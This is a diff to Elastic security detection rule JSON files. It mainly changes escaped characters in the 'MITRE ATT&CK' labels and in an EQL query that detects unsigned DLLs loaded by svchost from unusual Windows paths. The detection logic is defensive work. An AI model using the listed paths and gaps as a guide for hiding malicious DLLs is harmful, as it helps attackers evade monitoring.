\"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", "related_integrations": [ { "package": "endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_4.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_4.json index 7088ba51e71..4126e99d496 100644 --- a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_4.json +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by Svchost", - "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time \u003c= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", "related_integrations": [ { "package": "endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_5.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_5.json index 6dbcc6a06c6..6aba016b307 100644 --- a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_5.json +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_5.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by Svchost", - "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time \u003c= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", "related_integrations": [ { "package": "endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_1.json b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_1.json index b0887c2d884..b2a887d5d64 100644 --- a/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/79124edf-30a8-4d48-95c4-11522cad94b1_1.json @@ -43,7 +43,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_102.json b/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_102.json index 426c37aae8e..dc09b8b9ab6 100644 --- a/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_102.json +++ b/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_102.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_103.json b/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_103.json index f45f99d7b98..e809dea8639 100644 --- a/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_103.json +++ b/packages/security_detection_engine/kibana/security_rule/792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec_103.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_1.json b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_1.json index 50dfd734c03..314a6d1376d 100644 --- a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_1.json +++ b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_2.json b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_2.json index 376d1a1ea3f..bdd65b7f49d 100644 --- a/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_2.json +++ b/packages/security_detection_engine/kibana/security_rule/79ce2c96-72f7-44f9-88ef-60fa1ac2ce47_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_2.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_2.json index ceb044d8034..7f5f498b93e 100644 --- a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_2.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_3.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_3.json index e7d5c424609..787608a8f8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_3.json +++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_3.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_4.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_4.json index c7f36e5756e..d1ef9194512 100644 --- a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_5.json b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_5.json index 39d95e53a5d..6e9e59f3ebd 100644 --- a/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_5.json +++ b/packages/security_detection_engine/kibana/security_rule/79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_5.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_104.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_104.json index 29f1df6808e..df0922c2b0d 100644 --- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_104.json +++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_104.json @@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for 